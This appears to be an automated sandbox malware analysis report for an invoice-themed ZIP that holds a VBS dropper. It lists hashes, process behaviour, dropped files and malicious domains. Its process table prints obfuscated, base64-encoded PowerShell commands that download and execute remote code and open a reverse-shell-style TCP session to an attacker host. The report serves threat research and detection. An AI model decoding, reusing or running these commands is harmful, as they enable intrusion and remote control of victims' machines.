analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

__faktura_9875.zip

Full analysis: https://app.any.run/tasks/dc730fc6-c480-4cd8-b6e2-8e9d1c0769d4
Verdict: Malicious activity
Analysis date: January 10, 2019, 14:32:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

CE206F063C8C2121491CC4B6F4C5E8B8

SHA1:

86DEB3E3C8F99B59373E66DB2CE995AD5390BB84

SHA256:

16B35906A78E2683FB2C05CFA54F2FBE6CFD936DBA1354DC6789D67719EADECE

SSDEEP:

12:50aeYO87awZJy4i17a9x6wMiMRSF41OrkhgLY1ZdsKzae7OcgaY:u3FxsJModMACzgLY3ii3Kc8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes settings of System certificates

      • WScript.exe (PID: 2892)
      • WScript.exe (PID: 2440)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 3564)
      • cmd.exe (PID: 772)
    • Writes to a start menu file

      • powershell.exe (PID: 3004)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 1104)
      • powershell.exe (PID: 1440)
    • Creates files in the user directory

      • powershell.exe (PID: 1440)
      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 1104)
      • powershell.exe (PID: 3856)
      • powershell.exe (PID: 2732)
      • powershell.exe (PID: 3004)
    • Application launched itself

      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 1104)
      • powershell.exe (PID: 1440)
    • Adds / modifies Windows certificates

      • WScript.exe (PID: 2440)
      • WScript.exe (PID: 2892)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2440)
    • Uses IPCONFIG.EXE to discover IP address

      • powershell.exe (PID: 3004)
      • powershell.exe (PID: 2732)
      • powershell.exe (PID: 3856)
    • Executable content was dropped or overwritten

      • WScript.exe (PID: 2440)
  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 1104)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: __faktura_9875.vbs
ZipUncompressedSize: 651
ZipCompressedSize: 339
ZipCRC: 0xf776349e
ZipModifyDate: 2019:01:10 05:46:29
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 788
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
18
Malicious processes
4
Suspicious processes
5

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe wscript.exe cmd.exe no specs powershell.exe cmd.exe no specs powershell.exe cmd.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe ipconfig.exe no specs ipconfig.exe no specs ipconfig.exe no specs ipconfig.exe no specs ipconfig.exe no specs ipconfig.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2936"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\__faktura_9875.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2892"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\__faktura_9875.vbs" C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
2440"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\__faktura_9875.vbs" C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
3564"C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4012powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2348"C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1104powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
772"C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1440powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3856"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABSAEYAVgBVAHEANQAwADMAMAAwADgAPQBSAEYAVgBVAHEANQAwADMAMAAwADgAOwAgACAAIAAgAHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewAgACAAIAAgACAAIAAgACAAIAAgACAAdAByAHkAIAAgACAAIAB7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAUgBGAFYAVQBxADUAMAAzADAAMAA4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AIgAsACAAOAAwACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEMAdgB1AHoANgA2ADYANgAxADUAPQAoACQAUgBGAFYAVQBxADUAMAAzADAAMAA4AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABoAGQAcABPAE4AVQA1ADYANgAzAD0AMAAuAC4ANQAwADAAfAAlACAAewAwAH0AOwAgAAkACQAgACAAIAB3AGgAaQBsAGUAKAAoACQAWQByAFIAYQBjADAAMQA4ADUAMgA9ACQAQwB2AHUAegA2ADYANgA2ADEANQAuAFIAZQBhAGQAKAAkAGgAZABwAE8ATgBVADUANgA2ADMALAAwACwAJABoAGQAcABPAE4AVQA1ADYANgAzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewAgAAkACQAgACAAIAAgACQARgBiAHgAVgAzADQANQA2AD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABoAGQAcABPAE4AVQA1ADYANgAzACwAMAAsACQAWQByAFIAYQBjADAAMQA4ADUAMgApADsAJAB0AFcARAB5AHAAUQA4ADAAMwAxAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACgAaQBlAHgAIAAkAEYAYgB4AFYAMwA0ADUANgAgADIAPgAmADEAKQApADsAJABDAHYAdQB6ADYANgA2ADYAMQA1AC4AVwByAGkAdABlACgAJAB0AFcARAB5AHAAUQA4ADAAMwAxACwAMAAsACQAdABXAEQAeQBwAFEAOAAwADMAMQAuAEwAZQBuAGcAdABoACkAOwAkAEMAdgB1AHoANgA2ADYANgAxADUALgBGAGwAdQBzAGgAKAApACAACQAJAAkAfQAgAAkACQAgAH0AIAAgACAAIABjAGEAdABjAGgAIAAgACAAIAAgAHsAIAAgAAkAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADEANQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAKAAkAFIARgBWAFUAcQA1ADAAMwAwADAAOAAuAEMAbwBuAG4AZQBjAHQAZQBkACkAewAJACAACQAgACAAIAAgACAAIAAgACAAIAAgACAAJABSAEYAVgBVAHEANQAwADMAMAAwADgALgBDAGwAbwBzAGUAKAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAJAAkACQAgACAAIAAJAAkAfQAgACAAIAAgACAAIAAgAH0AC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 422
Read events
1 978
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
12
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2936WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa2936.26247\__faktura_9875.vbs
MD5:
SHA256:
4012powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OLNRTVW02882HJN3F5QC.temp
MD5:
SHA256:
1104powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GBCGBO981QTRV0O8M8F7.temp
MD5:
SHA256:
1440powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JH3DTHK80ESDDTRN1Z8I.temp
MD5:
SHA256:
3856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N8UTB5F8KMUKI6FJ3JF4.temp
MD5:
SHA256:
2732powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B08OZ32K3EE2XK7XD6K0.temp
MD5:
SHA256:
3004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PR7ICYH6KG83DW4MA3M1.temp
MD5:
SHA256:
2732powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF264685.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
1440powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2640c9.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
13
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2892
WScript.exe
185.158.251.30:443
serviceussupport.info
23media GmbH
NL
unknown
2440
WScript.exe
185.158.251.30:443
serviceussupport.info
23media GmbH
NL
unknown
2732
powershell.exe
194.32.78.61:80
infosevicues.info
suspicious
1440
powershell.exe
194.32.78.61:443
infosevicues.info
suspicious
3856
powershell.exe
194.32.78.61:80
infosevicues.info
suspicious
4012
powershell.exe
194.32.78.61:443
infosevicues.info
suspicious
1104
powershell.exe
194.32.78.61:443
infosevicues.info
suspicious
3004
powershell.exe
194.32.78.61:80
infosevicues.info
suspicious

DNS requests

Domain
IP
Reputation
serviceussupport.info
  • 185.158.251.30
unknown
infosevicues.info
  • 194.32.78.61
malicious

Threats

PID
Process
Class
Message
3004
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [PTsecurity] SysInfo Exfiltration
3004
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] System Enumeration via PowerShell
28 ETPRO signatures available at the full report
No debug info